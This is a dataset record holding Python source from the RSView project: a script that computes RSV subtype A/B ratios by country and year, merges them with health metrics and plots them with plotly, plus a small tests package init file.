"text": "\"\"\" Plot the correlation between RSV subtype prevalence and health metrics \"\"\"\n\nimport pandas as pd\nimport country_converter as coco\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\n\nimport map_rsv\nimport plot_rsv\n\nfrom parsearguments import correlation_parser\n\n# import rsview.parsearguments\n\n# from parsearguments import correlationParser\n\ndef country_to_iso3(country):\n \"\"\" Take user country input and convert to ISO3 to access dataframe \"\"\"\n if country == 'Global':\n return 'Global'\n iso3 = coco.convert(names=country, to='ISO3')\n return iso3\n\ndef count_subtypes(rsv_df):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, for each subtype (added across all years)\n \"\"\"\n\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(['country', 'subtype']).size()}).reset_index()\n\n return df_group\n\n\ndef count_subtypes_year(rsv_df):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, each year, for each subtype\n \"\"\"\n\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(\n ['country', 'subtype', 'year']).size()}).reset_index()\n\n return df_group\n\ndef get_ratio_all(dataframe):\n \"\"\"\n From counted subtypes, calculate the ratio of subtype A over subtype B in each country\n \"\"\"\n df_ratio = pd.DataFrame(columns=['country', 'ratio', 'count_A', 'count_B', 'count_total'])\n countries = dataframe['country'].unique()\n for i in countries:\n country_df = dataframe[dataframe['country'] == i]\n if country_df['subtype'].count() == 1:\n lone_subtype = country_df['subtype'].item()\n if lone_subtype == 'A':\n percent_a = 1\n count_a = country_df['count'].item()\n count_b = 0\n count_total = count_a + count_b\n\n else:\n percent_a = 0\n count_a = 0\n count_b = country_df['count'].item()\n count_total = count_a + count_b\n else:\n count_a = float(country_df[country_df['subtype'] == 'A']['count'])\n count_b = float(country_df[country_df['subtype'] == 'B']['count'])\n percent_a = count_a/(count_a + count_b)\n count_total = count_a + count_b\n df_ratio = df_ratio.append(\n pd.Series([i, percent_a, count_a, count_b, count_total],\n index=df_ratio.columns, name=i))\n return df_ratio\n\ndef get_ratio_year(dataframe):\n \"\"\"\n From counted subtypes, calculate the ratio of subtype A\n over subtype B in each country, each year\n \"\"\"\n df_ratio = pd.DataFrame(\n columns=['country', 'year', 'ratio', 'count_A', 'count_B', 'count_total'])\n countries = dataframe['country'].unique()\n for i in countries:\n country_df = dataframe[dataframe['country'] == i]\n years = country_df['year'].unique()\n for j in years:\n years_df = country_df[country_df['year'] == j]\n if years_df['subtype'].count() == 1:\n lone_subtype = years_df['subtype'].item()\n if lone_subtype == 'A':\n percent_a = 1\n count_a = years_df['count'].item()\n count_b = 0\n count_total = count_a + count_b\n else:\n percent_a = 0\n count_a = 0\n count_b = years_df['count'].item()\n count_total = count_a + count_b\n else:\n count_a = float(years_df[years_df['subtype'] == 'A']['count'])\n count_b = float(years_df[years_df['subtype'] == 'B']['count'])\n percent_a = count_a/(count_a + count_b)\n count_total = count_a + count_b\n df_ratio = df_ratio.append(\n pd.Series([i, j, percent_a, count_a, count_b, count_total],\n index=df_ratio.columns, name=i))\n return df_ratio\n\n\ndef merge_ratio_health(df_ratio, datadir):\n \"\"\"\n Merge the RSV sequence dataframe with calculated ratios with the health dataframe\n \"\"\"\n df_health_summary = plot_rsv.make_df_health_summary(datadir)\n df_ratio[\"iso3\"] = [country_to_iso3(x) for x in df_ratio.country.values]\n\n df_merge = pd.merge(df_ratio, df_health_summary, how='inner', on=['iso3'])\n\n return df_merge\n\ndef merge_ratio_health_year(df_ratio, datadir):\n \"\"\"\n Merge the RSV sequence dataframe with yearly calculated ratios with the health dataframe\n \"\"\"\n df_health_all = plot_rsv.make_df_health_all(datadir)\n df_ratio[\"iso3\"] = [country_to_iso3(x) for x in df_ratio.country.values]\n\n df_merge = pd.merge(df_ratio, df_health_all, how='inner', on=['iso3', 'year'])\n\n return df_merge\n\n\n\ndef plot_ratio(df_merge, data_type):\n \"\"\"\n Plot the calculated subtype ratios\n \"\"\"\n trace1 = go.Scatter(\n x=df_merge['ratio'],\n y=df_merge[data_type],\n mode='markers',\n marker=dict(size=14,\n line=dict(width=1),\n color='rgba(204,204,204,1)'\n ),\n text=df_merge['country_short'] # The hover text goes here\n )\n\n layout = go.Layout(\n title='RSV Subtype Prevalence compared to ' + plot_rsv.DATA_DICT[data_type],\n hovermode='closest',\n xaxis=dict(\n title='Ratio of Subtype A over Subtype B Sequences Recorded',\n # ticklen= 5,\n # zeroline= False,\n # gridwidth= 2,\n ),\n yaxis=dict(\n title=plot_rsv.DATA_DICT[data_type],\n # ticklen= 5,\n # gridwidth= 2,\n ),\n showlegend=False\n )\n\n data = [trace1]\n\n fig = go.Figure(data=data, layout=layout)\n plot(fig)\n\n\n\ndef plot_ratio_year(df_merge, data_type):\n \"\"\"\n Plot the calculated subtype ratios for each year\n \"\"\"\n\n df_merge['hover'] = df_merge['country_short'] + ', ' + df_merge['year'].astype(int).map(str)\n\n trace1 = go.Scatter(\n x=df_merge['ratio'],\n y=df_merge[data_type],\n mode='markers',\n marker=dict(size=14,\n line=dict(width=1),\n color=df_merge['year'],\n colorscale='RdBu',\n showscale=True,\n # cmin=1990,\n # cmax=2018\n ),\n text=df_merge['hover'] # The hover text goes here\n )\n\n layout = go.Layout(\n title='RSV Subtype Prevalence compared to ' + plot_rsv.DATA_DICT[data_type],\n hovermode='closest',\n xaxis=dict(\n title='Ratio of Subtype A over Subtype B Sequences Recorded',\n # ticklen= 5,\n # zeroline= False,\n # gridwidth= 2,\n ),\n yaxis=dict(\n title=plot_rsv.DATA_DICT[data_type],\n # ticklen= 5,\n # gridwidth= 2,\n ),\n showlegend=False\n )\n\n data = [trace1]\n\n fig = go.Figure(data=data, layout=layout)\n plot(fig)\n\n\n\ndef main(level, data_type, datadir):\n \"\"\"\n Organize genotype data and plot correlation between subtypes and health metrics\n \"\"\"\n rsv_df = map_rsv.organize_data(datadir, map_rsv.GENOTYPE_DICT)\n rsv_df = rsv_df.dropna(subset=['subtype']).copy()\n\n rsv_df_year = rsv_df.dropna(subset=['year']).copy()\n rsv_df_year['year'] = rsv_df_year['year'].astype(int)\n\n if level == 'all':\n rsv_df_count = count_subtypes(rsv_df)\n df_ratio_all = get_ratio_all(rsv_df_count)\n df_merged = merge_ratio_health(df_ratio_all, datadir)\n plot_ratio(df_merged, data_type)\n\n else:\n rsv_df_count = count_subtypes_year(rsv_df)\n df_ratio_year = get_ratio_year(rsv_df_count)\n df_merged = merge_ratio_health_year(df_ratio_year, datadir)\n plot_ratio_year(df_merged, data_type)\n\n\n\nif __name__ == \"__main__\":\n\n ARGS = correlation_parser(plot_rsv.dict_to_help(plot_rsv.DATA_DICT)).parse_args()\n\n main(ARGS.level, ARGS.data_type, ARGS.datadir)\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6071428656578064,
"avg_line_length": 17.66666603088379,
"blob_id": "689b054826914ede045f211054cd557138c6b76a",
"content_id": "28153c2df51f43394d56a91c6f9809a59306944e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 3,
"path": "/rsview/tests/__init__.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test submodule for rsview\"\"\"\n\n__version__ = '0.dev1'\n"
}
] | 25 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.